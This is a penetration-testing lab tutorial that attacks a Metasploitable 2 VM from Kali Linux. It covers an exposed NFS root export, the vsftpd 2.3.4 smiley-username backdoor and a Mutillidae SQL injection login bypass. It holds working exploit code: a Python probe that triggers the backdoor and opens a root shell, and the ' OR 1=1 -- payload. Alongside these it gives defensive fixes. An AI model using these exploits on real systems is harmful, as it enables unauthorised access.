In our previous article on How To Install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. This setup included an ‘attacker’ running Kali Linux and a ‘target’ running the Linux-based Metasploitable. Both operating systems run as Virtual Machines (VMs) under VirtualBox.
Using this environment we will demonstrate a selection of exploits using a variety of tools from within Kali Linux against Metasploitable V2. For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide.
Pentesting Lab
Here is a brief outline of the environment being used:
- VirtualBox: version 6.1
- Kali Linux:
  - VM version = Kali Linux 2020.4, AMD64
  - Kernel release = 5.9.0-kali1-amd64
  - IP address = 10.0.2.15
  - Login = kali/kali
- Metasploitable:
  - VM version = Metasploitable 2, Ubuntu 64-bit
  - Kernel release = 2.6.24-16-server
  - IP address = 10.0.2.4
  - Login = msfadmin/msfadmin
NFS Service vulnerability
First we need to list which services are visible on the target:
The scan shows NFS (Network File System) listening on port 2049, so next we determine which shares are being exported:
The ‘showmount’ command tells us that the root ‘/’ of the file system is being exported. Next we mount the Metasploitable file system so that it is accessible from within Kali:
This is a configuration problem rather than a software bug: exporting the root of the file system lets a client that is allowed to mount it (here, the attacking machine) browse everything on the target’s disk, which hands a great deal of valuable information to a potential attacker.
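The enumeration and mount steps above, written up as an added Python example (this is not code from the original article): it parses `showmount -e` output and an `/etc/exports` file, flags the settings that make this a configuration problem, and builds the Kali-side mount command. The sample `showmount` output, the weak and corrected exports lines, and the `/mnt/nfs` mount point are constructed for the example rather than captured from the lab.

```python
import re

# Constructed sample of `showmount -e 10.0.2.4` output; not captured from the
# lab, but it matches what the text describes (Metasploitable 2 exports /).
SAMPLE_SHOWMOUNT = """Export list for 10.0.2.4:
/ *
"""

# Constructed /etc/exports lines: the weak one is the kind of line that produces
# the export above (assumed, not copied from the VM); the fixed one narrows the
# path, the client range and the remote root's privileges.
WEAK_EXPORTS = "/ *(rw,sync,no_root_squash,no_subtree_check)\n"
FIXED_EXPORTS = "/srv/share 10.0.2.0/24(ro,sync,root_squash,no_subtree_check)\n"


def parse_showmount(text):
    """Parse `showmount -e` output into [(export_path, [client, ...]), ...]."""
    exports = []
    for line in text.splitlines()[1:]:          # skip the "Export list for" header
        parts = line.split(None, 1)
        if not parts:
            continue
        clients = parts[1].split(",") if len(parts) > 1 else []
        exports.append((parts[0], [c.strip() for c in clients]))
    return exports


def parse_exports_file(text):
    """Parse /etc/exports into [(path, client, [option, ...]), ...]."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()    # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if not m:
                continue
            client = m.group(1) or "*"          # "(rw)" with no host means everyone
            opts = m.group(2).split(",") if m.group(2) else []
            entries.append((path, client, opts))
    return entries


def audit_exports(entries):
    """Flag exports that any host can mount, that expose /, that keep remote
    root as uid 0, or that are writable. Returns [(path, client, [reason, ...])]."""
    findings = []
    for path, client, opts in entries:
        reasons = []
        if client in ("*", "(everyone)"):
            reasons.append("any host may mount it")
        if path == "/":
            reasons.append("root of the file system is exported")
        if "no_root_squash" in opts:
            reasons.append("remote root keeps uid 0 (no_root_squash)")
        if "rw" in opts:
            reasons.append("writable")
        if reasons:
            findings.append((path, client, reasons))
    return findings


def mount_command(server, path, mountpoint="/mnt/nfs"):
    """The Kali-side command to mount a discovered export (mount point is assumed)."""
    return f"sudo mount -t nfs {server}:{path} {mountpoint}"


if __name__ == "__main__":
    for path, clients in parse_showmount(SAMPLE_SHOWMOUNT):
        print(path, clients, "->", mount_command("10.0.2.4", path))
    print("weak :", audit_exports(parse_exports_file(WEAK_EXPORTS)))
    print("fixed:", audit_exports(parse_exports_file(FIXED_EXPORTS)))
```

On the target side the fix is the second exports line: a dedicated directory instead of `/`, a client list instead of `*`, read-only where possible, and `root_squash` so a remote root is mapped to an unprivileged user.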
FTP Server backdoor
The vulnerability demonstrated here is a backdoor that was planted in the source code distributed for a commonly used package, the vsftpd FTP server. The FTP server has since been fixed, but here is how the affected version (vsftpd 2.3.4) could be exploited:
In the previous section we identified that the FTP service was running on port 21, so let’s try to access it via ‘telnet’:
This vulnerability can also be exploited from the Metasploit Framework using the ‘VSFTPD v2.3.4 Backdoor Command Execution’ module (exploit/unix/ftp/vsftpd_234_backdoor).
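The exchange that the telnet session above performs, as an added Python example (not the article’s own code, and not vsftpd’s): the backdoor fires when the USER name contains the two bytes `:)`, after which the server listens on TCP port 6200 and hands any connection to a shell. So that it can be exercised offline, the block also starts a throwaway stand-in for the backdoored server on localhost; that stand-in, its ephemeral ports and its canned reply to `id` are constructed for the example and do not execute anything. Against the real VM you would call `probe_vsftpd_backdoor("10.0.2.4")` with the default ports 21 and 6200.

```python
import socket
import threading

TRIGGER = b":)"   # the backdoor fires on a username containing these two bytes


def start_fake_vsftpd(backdoored=True):
    """Start a minimal stand-in for vsftpd 2.3.4 on 127.0.0.1 in a thread.
    Returns (ftp_port, backdoor_port). The real backdoor listens on TCP 6200
    and hands the connection to /bin/sh; this simulation uses an ephemeral
    port and only answers 'id', so nothing is actually executed."""
    ftp = socket.socket()
    ftp.bind(("127.0.0.1", 0))
    ftp.listen(1)
    door = socket.socket()
    door.bind(("127.0.0.1", 0))        # bound but not listening: connects are refused

    def session():
        conn, _ = ftp.accept()
        triggered = False
        with conn, conn.makefile("rb") as lines:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            for raw in lines:
                cmd, _, arg = raw.rstrip(b"\r\n").partition(b" ")
                cmd = cmd.upper()
                if cmd == b"USER":
                    triggered = backdoored and TRIGGER in arg
                    conn.sendall(b"331 Please specify the password.\r\n")
                elif cmd == b"PASS":
                    if triggered:
                        door.listen(1)  # the "shell" port becomes reachable here
                    conn.sendall(b"530 Login incorrect.\r\n")
                    if triggered:
                        break
                elif cmd == b"QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    break
                else:
                    conn.sendall(b"530 Please login with USER and PASS.\r\n")
        ftp.close()
        if not triggered:
            door.close()
            return
        shell, _ = door.accept()
        with shell, shell.makefile("rb") as cmds:
            for raw in cmds:            # canned "shell": constructed replies only
                line = raw.strip()
                if line == b"id":
                    shell.sendall(b"uid=0(root) gid=0(root)\n")
                elif line == b"exit":
                    break
                else:
                    shell.sendall(b"sh: " + line + b": not found\n")
        door.close()

    threading.Thread(target=session, daemon=True).start()
    return ftp.getsockname()[1], door.getsockname()[1]


def probe_vsftpd_backdoor(host, ftp_port=21, backdoor_port=6200, timeout=3.0):
    """Reproduce the telnet exchange: USER containing ':)', PASS anything, then
    connect to the backdoor port and run 'id'. Returns the shell's reply, or
    None if the port does not answer (not vulnerable)."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        with ftp.makefile("rb") as replies:
            replies.readline()                       # 220 banner
            ftp.sendall(b"USER letmein" + TRIGGER + b"\r\n")
            replies.readline()                       # 331
            ftp.sendall(b"PASS anything\r\n")
            replies.readline()                       # 530: the login itself fails
    try:
        with socket.create_connection((host, backdoor_port), timeout=timeout) as shell:
            with shell.makefile("rb") as out:
                shell.sendall(b"id\n")
                reply = out.readline().decode().strip()
            shell.sendall(b"exit\n")
            return reply or None
    except OSError:                                  # connection refused or timeout
        return None


if __name__ == "__main__":
    ftp_port, door_port = start_fake_vsftpd()
    print(probe_vsftpd_backdoor("127.0.0.1", ftp_port, door_port))
```

Note that the FTP login itself still fails with ‘530 Login incorrect’; the smiley in the username is what matters, and the shell appears on a separate port rather than on the FTP connection.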
Web Application vulnerabilities
There are a number of intentionally vulnerable web applications included with Metasploitable. Here we examine Mutillidae, which contains the OWASP Top Ten vulnerabilities and more.
Mutillidae has the following features:
- Setting the Security Level from 0 (completely insecure) through to 5 (secure).
- Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints).
- A ‘Reset DB’ button in case the application gets damaged during attacks and the database needs reinitializing.
Understanding Mutillidae
Let’s begin by pulling up the Mutillidae homepage:
Notice that the Security Level is set to 0, Hints is also set to 0, and that no user is logged in. These are the defaults, and they can be changed via the Toggle Security and Toggle Hints buttons.
Information about each OWASP vulnerability can be found under the menu on the left:
Attempting an exploit
For our first example we have Toggled Hints to ‘1’ and selected the ‘A1- Injection -> SQLi – Bypass Authentication -> Login’ vulnerability:
Trying the SQL Injection method of entering ' OR 1=1 -- (with a trailing space) into the Name field, as described in the hints, gave the following errors:
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 148
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 254
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 255
Warning: Cannot modify header information - headers already sent by (output started at /var/www/mutillidae/process-login-attempt.php:97) in /var/www/mutillidae/index.php on line 256
This turns out to be caused by a minor, yet crucial, configuration problem: Mutillidae’s config.inc names the wrong database, which breaks any database-related functionality.
Fixing Mutillidae
Here is the resolution to this problem:
- Within Metasploitable edit the following file via either of these commands:
  - sudo vi /var/www/mutillidae/config.inc
  - sudo nano /var/www/mutillidae/config.inc
- Next change the following line then save the file:
  - $dbname = 'metasploit'
  to
  - $dbname = 'owasp10'
- In Kali Linux bring up the Mutillidae web application in the browser as before and click the ‘Reset DB’ button to re-initialize the database.
- Restart the web server via the following command:
  - sudo /etc/init.d/apache2 restart
Back on the Login page try entering the following SQL Injection code, including a trailing space after the two dashes, into the Name field:
- ' OR 1=1 -- 
The Login should now work successfully without having to input a password! This is Bypassing Authentication via SQL Injection. The single quote closes the string literal holding the Name, so the rest of the input is read as SQL; OR 1=1 makes the WHERE clause true for every row, so the query returns accounts instead of nothing; and the two dashes turn the remainder of the statement, including the Password check, into a comment. The trailing space matters because MySQL only treats -- as the start of a comment when it is followed by whitespace.
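The query being abused, shown as an added Python example rather than Mutillidae’s own PHP: the vulnerable login builds its SQL by string concatenation, exactly as the security level 0 code does, and sits beside the parameterized version that defeats the same payload. The in-memory SQLite database, its accounts table and the two user rows are constructed stand-ins for Mutillidae’s real schema and data.

```python
import sqlite3


def make_db():
    """Constructed stand-in for Mutillidae's accounts table (not its real schema or data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)",
                   [("admin", "adminpass"), ("adrian", "somepassword")])
    return db


# The payload from the article. Two hyphens start a comment in SQL; MySQL (which
# Mutillidae uses) only honours "--" when whitespace follows it, hence the
# trailing space. SQLite, used here, accepts it either way.
PAYLOAD = "' OR 1=1 -- "


def vulnerable_query(username, password):
    """Security level 0 behaviour: user input is concatenated straight into the SQL."""
    return ("SELECT username FROM accounts WHERE username='" + username +
            "' AND password='" + password + "'")


def login_vulnerable(db, username, password):
    """Returns the username of the account that was logged in, or None."""
    rows = db.execute(vulnerable_query(username, password)).fetchall()
    return rows[0][0] if rows else None


def login_fixed(db, username, password):
    """Same check with a parameterized query: the payload is just an unusual
    username that matches no row, so the password check is never bypassed."""
    rows = db.execute(
        "SELECT username FROM accounts WHERE username=? AND password=?",
        (username, password)).fetchall()
    return rows[0][0] if rows else None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(PAYLOAD, ""))
    print("vulnerable login ->", login_vulnerable(db, PAYLOAD, ""))
    print("fixed login      ->", login_fixed(db, PAYLOAD, ""))
```

Printing `vulnerable_query(PAYLOAD, "")` makes the mechanism visible: everything after `-- ` is a comment, so the executed statement is effectively `SELECT username FROM accounts WHERE username='' OR 1=1`, which matches every account. With placeholders the database driver never parses the payload as SQL at all.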
Mutillidae has many different types of web application vulnerability to discover, at varying levels of difficulty, to teach and challenge budding pentesters.
Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) that reflects a rather outdated OWASP Top 10. For a more up-to-date version visit:
This version will not install on Metasploitable due to out-of-date packages, so it is best to load it onto a Linux VM such as Kali or Ubuntu.
Have you used Metasploitable to practice Penetration Testing? Do you have any feedback on the above examples? If so please share your comments below.